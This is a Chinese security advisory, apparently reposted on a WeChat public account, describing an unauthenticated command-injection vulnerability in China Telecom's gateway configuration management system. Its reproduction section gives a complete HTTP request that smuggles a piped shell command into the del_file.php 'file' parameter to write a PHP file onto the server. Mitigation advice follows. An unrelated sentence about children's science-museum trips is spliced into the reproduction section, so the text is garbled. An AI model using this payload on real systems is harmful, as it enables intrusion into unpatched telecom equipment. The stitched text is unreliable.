01
产品介绍
中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等功能,从而确保网络的正常运行和高效性能。
02
漏洞详情
电信网关配置管理系统 /manager/newtpl/del_file.php 接口存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意代码,从而获取服务器权限。
03
漏洞复现
科技馆研学不仅仅是参观,还有丰富的活动等待孩子们参与。通过科普讲座、实验室体验、手工制作等形式,孩子们能更深入地了解某一领域的知识。
GET
/manager/newtpl/del_file.phpfile=1.txt%7Cecho%20PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4=%20%7C%20base64%20-d%20%3E%20123123.php HTTP/1.1
Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
04
修复建议
官方已修复该漏洞,请用户联系厂商修复:http://189.cn/fj_np/
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。
文章来源:网络
公众号“河北镌远网络科技有限公司”所发表内容注明来源的,版权归原出处所有(无法查证版权的或者未注明出处的均来自网络,系转载,转载的目的在于传递更多信息,版权属于原作者。如有侵权,请联系,小编会第一时间删除处理)
ps:亲爱的读者们,对于网络安全或技术方面的疑惑和好奇,您都可以在公众号的下方留言与我们互动。这里汇聚了众多专业技术人员,他们将会针对您的问题提供详细而专业的解答。我们热切期待与您一同探讨网络安全的方方面面,共同为构建安全、稳定的网络环境贡献智慧和力量。让我们一起在知识的海洋中遨游,发现更多可能!